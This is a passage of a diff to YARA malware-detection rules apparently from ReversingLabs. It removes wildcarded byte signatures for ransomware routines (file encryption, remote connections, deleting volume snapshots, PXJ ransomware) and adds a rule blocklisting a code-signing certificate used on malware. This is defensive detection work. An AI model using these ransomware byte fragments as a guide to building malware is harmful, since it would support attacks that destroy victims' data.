-            ?? ?? ?? 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74
-            24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 58 39 44 24 ?? 73 ?? 89 44 24 ?? 39 74 24
-            ?? 75 ?? 33 C0 3B C7 75 ?? 39 5C 24 ?? 7C ?? 7F ?? 83 7C 24 ?? ?? 76 ?? 8B 44 24 ??
-            83 E0 ?? 74 ?? 8B 4C 24 ?? 2B C8 03 C9 89 4C 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 74 24 ??
-            53 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24
-            ?? 50 81 EC ?? ?? ?? ?? 6A ?? 59 8B FC FF B4 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? FF
-            B4 24 ?? ?? ?? ?? F3 A5 8B B4 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ??
-            53 8D 44 24 ?? 50 FF 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 68 ?? ?? ?? ??
-            53 56 74 ?? FF 15 ?? ?? ?? ?? FF 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 33 C0 3B 44 24 ??
-            0F 8C ?? ?? ?? ?? 7F ?? 8B 4C 24 ?? 3B 4C 24 ?? 0F 82 ?? ?? ?? ?? EB ?? C6 44 24 ??
-            ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 74 24 ?? FF 15 ?? ?? ?? ??
-            FF 74 24 ?? 8B 3D ?? ?? ?? ?? FF D7 FF 74 24 ?? FF D7 56 8D 84 24 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 38 5C 24 ?? 8D 84 24
-            ?? ?? ?? ?? 75 ?? 6A ?? FF 74 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 FF 74 24 ?? 68 ?? ??
-            ?? ?? 75 ?? E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF D6 EB ?? E8 ?? ?? ?? ??
-            59 59 B0 ?? EB ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 32 C0 8B 8C 24 ?? ?? ?? ??
-            5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection_2 = {
-            55 8D 6C 24 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ??
-            53 56 57 BE ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 04
-            24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 56 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ??
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ??
-            ?? BE ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ??
-            E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
-            ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A
-            ?? 8D 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ??
-            ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? 57
-            8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ??
-            6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ??
-            ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A
-            ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85
-            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C3
-            50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50
-            E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50
-            FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 59 59 5F 5E 5B 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            59 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B 85 ??
-            ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 83 C5 ?? C9 C3
-        }
-		$remote_connection_1 = {
-            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85
-            ?? ?? ?? ?? 50 8B F9 8B F2 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15
-            ?? ?? ?? ?? 33 DB 53 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 89 85 ?? ?? ?? ?? 66 C7 85
-            ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
-            88 1F 50 88 1E 66 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D
-            85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 38 9D ?? ?? ??
-            ?? 59 59 75 ?? 68 ?? ?? ?? ?? C6 07 ?? E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8D 85 ?? ??
-            ?? ?? 50 E8 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 33 F6 BB ?? ?? ?? ??
-            56 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5
-            ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 53 E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ??
-            46 83 FE ?? 59 59 7C ?? EB ?? 53 E8 ?? ?? ?? ?? 59 83 BD ?? ?? ?? ?? ?? 7C ?? C6 07
-            ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 F6 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 66
-            89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ??
-            68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 50 FF
-            B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 68
-            ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ??
-            ?? ?? 3B C6 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 89 B5 ?? ?? ?? ?? 0F 84 ??
-            ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8 ?? ??
-            ?? ?? 59 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B C8 85 C9
-            89 8D ?? ?? ?? ?? 7D ?? C6 07 ?? 51 E9 ?? ?? ?? ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 83 BD
-            ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 33 C0 8D BD ?? ?? ?? ?? 66
-            AB 40 3B C8 89 85 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 8D 47 ?? E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 8B 77 ?? 2B 37
-            8D 46 ?? 50 E8 ?? ?? ?? ?? 59 56 6A ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 07 8B
-            8D ?? ?? ?? ?? 83 C4 ?? 03 C8 51 8B 4F ?? 2B C8 51 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 8D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 59 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 59 40 50 E8
-            ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? 8B F0 6A ?? 56 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? FF B5 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 56 53 C6 04 06 ??
-            E8 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 83 C4 ?? 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6
-            3B C6 59 59 0F 8C ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85
-            ?? ?? ?? ?? 83 F8 ?? 7E ?? 48 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF
-            B5 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 85 C0 59 59 75 ?? 8B 06 8B 8D ?? ?? ?? ?? 03
-            C8 51 8B 4E ?? 2B C8 51 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ??
-            83 C6 ?? FF 8D ?? ?? ?? ?? 75 ?? 33 F6 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ??
-            ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 85 ?? ?? ?? ?? 8B 85 ?? ?? ??
-            ?? 83 C7 ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ??
-            ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 B0 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 50 53 C6
-            01 ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 59 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ??
-            59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74
-            ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 53 C6 00 ?? E8 ?? ?? ??
-            ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C6 00 ?? EB ?? 0F
-            84 ?? ?? ?? ?? C6 07 ?? FF 15 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 83 BD ?? ?? ??
-            ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ??
-            FF 15 ?? ?? ?? ?? 32 C0 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $search_and_encrypt_files and $remote_connection_1 and $remote_connection_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "3 AM CHP" and pe.signatures [ i ] . serial == "67:31:cb:14:30:f1:8b:8c:0c:43:ab:40:e1:15:41:69" and 1436313600 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_PXJ : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_159505E6456B9A9352F7C47168D89B96 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects PXJ ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "c1549905-5b31-55c0-a275-0ab8133b3504"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "3d078c5d-e469-54f1-bd69-aebeec1c25f1"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.PXJ.yara#L1-L158"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "e88d27dcd7ad3af459bd7e34fcc827822365441446b0e4e7bbec399c9a948cb7"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L16836-L16852"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d6d0d5c86dd88afa29fb3c7cc3c0ab2e3401637a23e062ee9bab693a715cf16f"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "PXJ"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files_p1 = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 8B D9 68 ?? ?? ?? ??
-            33 F6 8D 8D ?? ?? ?? ?? 33 C0 56 51 89 9D ?? ?? ?? ?? 66 89 85 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 83 C4 ?? 53 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ??
-            ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ??
-            ?? ?? 8A 85 ?? ?? ?? ?? A8 ?? 0F 85 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ?? ?? 53 8D 85 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? E9 ?? ??
-            ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B
-            50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ??
-            3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66
-        }
-		$find_files_p2 = {
-            3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB
-            ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 9F ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 8B 9D ?? ?? ?? ?? E9 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B FF
-            66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1
-            ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 8B FF 66 8B 10 66 3B 11 75 ?? 66 3B D6 74 ?? 66 8B 50 ?? 66 3B 51
-            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 3B D6 75 ?? 33 C0 EB ?? 1B C0 83 D8 ?? 3B C6 0F 84 ??
-            ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 ?? 8D 95 ?? ??
-            ?? ?? 52 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B 85
-            ?? ?? ?? ?? 8B D1 83 C4 ?? 0B D0 89 B5 ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? 74 ?? 50 51 8D
-            85 ?? ?? ?? ?? 50 57 E8 ?? ?? ?? ?? B9 ?? ?? ?? ?? 3A C1 75 ?? 01 8F ?? ?? ?? ?? 11
-            B7 ?? ?? ?? ?? EB ?? 01 8F ?? ?? ?? ?? 11 B7 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? 51 52 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15
-            ?? ?? ?? ?? 8B 4D ?? 5E 33 CD B0 ?? 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1
-            ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 68
-            ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 89 85 ?? ?? ?? ?? 8B 45 ?? 68 ?? ?? ?? ?? 50 89 85 ??
-            ?? ?? ?? FF 15 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ?? 83 FB ?? 0F 84 ?? ?? ?? ?? 8B 4D
-            ?? 8B 55 ?? 51 52 E8 ?? ?? ?? ?? 0B C2 74 ?? 53 FF 15 ?? ?? ?? ?? B0 ?? E9 ?? ?? ??
-            ?? 68 ?? ?? ?? ?? 33 DB 8D 85 ?? ?? ?? ?? 53 50 C6 85 ?? ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 51 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83
-            C4 ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 33 F6 6A ?? 53 E8 ?? ?? ?? ?? 88 44 35 ??
-            46 83 FE ?? 7C ?? 8D 55 ?? 52 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ??
-            ?? ?? ?? 8D B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 88 9D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8B CE 89 5D ?? E8 ?? ?? ?? ?? 81 EC ??
-            ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B F4 89 A5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? 6A ?? 51
-        }
-		$encrypt_files_p2 = {
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 72 ?? 8B 95
-            ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 83 C4 ?? 8B B5 ?? ?? ?? ?? 53 53 33 C9 51 33 C0 50 56
-            FF 15 ?? ?? ?? ?? 85 C0 75 ?? 56 FF 15 ?? ?? ?? ?? 32 C0 E9 ?? ?? ?? ?? 53 8D 85 ??
-            ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 56 89 9D ?? ?? ?? ?? 89 9D ?? ?? ??
-            ?? 89 9D ?? ?? ?? ?? 89 9D ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 85 ?? ?? ?? ??
-            8B 3D ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3B C3 0F 84 ?? ?? ?? ?? 6A ?? F7 D8 99 53 52 50
-            56 FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52
-            8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8D 8D ?? ?? ?? ?? 51 50 8D
-            95 ?? ?? ?? ?? 52 56 FF D7 85 C0 0F 84 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 0F 84 ?? ?? ??
-            ?? 81 BD ?? ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 39 9D ?? ?? ?? ?? 77 ?? 81 BD ??
-            ?? ?? ?? ?? ?? ?? ?? 0F 82 ?? ?? ?? ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 8B 9D
-            ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 D2 52 52 52 33 C9 51 50
-            FF 15 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8B C6 8D
-        }
-		$encrypt_files_p3 = {
-            48 ?? 8B FF 66 8B 10 83 C0 ?? 66 85 D2 75 ?? 2B C1 6A ?? D1 F8 8D 8D ?? ?? ?? ?? 51
-            8D 14 00 8B 83 ?? ?? ?? ?? 52 56 50 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 8D ?? ?? ?? ??
-            51 6A ?? 68 ?? ?? ?? ?? 52 FF D7 8B 93 ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ??
-            8D 4D ?? 51 52 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 6A ?? 68 ?? ?? ??
-            ?? 51 FF D7 8B 8B ?? ?? ?? ?? 6A ?? 8D 95 ?? ?? ?? ?? 52 6A ?? 8D 85 ?? ?? ?? ?? 50
-            51 FF D7 8B B5 ?? ?? ?? ?? 6A ?? 33 C9 51 51 B8 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ??
-            85 C0 74 ?? 33 DB EB ?? 83 85 ?? ?? ?? ?? ?? 11 9D ?? ?? ?? ?? 53 8D 95 ?? ?? ?? ??
-            52 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ??
-            ?? 8B 9D ?? ?? ?? ?? 8B 4D ?? 8B 55 ?? 51 52 8D BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 68 ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 8B 95
-            ?? ?? ?? ?? 83 C4 ?? 52 FF 15 ?? ?? ?? ?? 33 C9 51 51 33 C0 51 50 8B 83 ?? ?? ?? ??
-            50 FF 15 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 52 56
-            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 94 C0 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B
-            4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C2
-        }
-		$delete_volumes_snapshots_p1 = {
-            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
-            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B 45 ?? 6A ?? 33 FF 57 57 89
-            85 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 57 68 ?? ?? ?? ?? FF D6 57 68 ??
-            ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF D6 57 68 ?? ?? ?? ?? FF
-            D6 57 57 8D 8D ?? ?? ?? ?? 51 57 89 BD ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 68 ?? ?? ?? ?? 52 E8 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 57 68 ?? ?? ?? ??
-            6A ?? 57 57 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B D8 83 FB ?? 0F
-            84 ?? ?? ?? ?? 83 EC ?? 8B F4 89 7E ?? C7 46 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? B8 ?? ??
